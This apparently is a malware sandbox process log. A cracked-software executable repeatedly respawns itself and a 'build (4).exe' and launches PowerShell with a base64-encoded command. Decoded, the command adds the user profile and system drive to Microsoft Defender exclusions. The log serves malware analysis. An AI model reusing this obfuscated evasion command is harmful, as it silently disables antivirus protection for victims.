C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"35⤵PID:7492
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="36⤵PID:7692
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"36⤵PID:7720
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"36⤵PID:7836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="37⤵PID:8004
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"37⤵PID:8044
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"37⤵PID:8072
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="38⤵PID:7272
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"38⤵PID:7116
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"38⤵PID:7264
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="39⤵PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"39⤵PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"39⤵PID:3012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="40⤵PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"40⤵PID:1224
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"40⤵PID:568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="41⤵PID:7768
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"41⤵PID:7780
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"41⤵PID:7332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="42⤵PID:7264
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"42⤵PID:7572
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"42⤵PID:1096
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="43⤵PID:7476
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"43⤵PID:8076
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"43⤵PID:4348
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="44⤵PID:2188
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"44⤵PID:1632
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"44⤵PID:4592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="45⤵PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"45⤵PID:936
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"45⤵PID:4480
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="46⤵PID:1040
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"46⤵PID:216
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"46⤵PID:5088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="47⤵PID:2680
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"47⤵PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"47⤵PID:3524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="48⤵PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"48⤵PID:3520
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"48⤵PID:920
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="49⤵PID:7884
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"49⤵PID:4480
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"49⤵PID:3268
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="50⤵PID:5008
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"50⤵PID:5472
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"50⤵PID:2388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="51⤵PID:5556
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"51⤵PID:5444
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"51⤵PID:5952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="52⤵PID:5964
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"52⤵PID:5788
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"52⤵PID:4628
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="53⤵PID:5368
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"53⤵PID:6004
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"53⤵PID:5656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="54⤵PID:5180
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"54⤵PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"54⤵PID:6508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="55⤵PID:5164
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"55⤵PID:2584
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"55⤵PID:6800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="56⤵PID:5660
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"56⤵PID:6104
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"56⤵PID:5276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="57⤵PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"57⤵PID:6356
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"57⤵PID:6360
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="58⤵PID:2852
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"58⤵PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"58⤵PID:5488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="59⤵PID:5724
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"59⤵PID:3960
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"59⤵PID:7132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="60⤵PID:6384
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"60⤵PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"60⤵PID:7060
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="61⤵PID:6968
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"61⤵PID:6360
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"61⤵PID:7616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="62⤵PID:6408
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"62⤵PID:7140
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"62⤵PID:6460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="63⤵PID:7900
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"63⤵PID:6368
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"63⤵PID:6776
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="64⤵PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"64⤵PID:7468
-
-
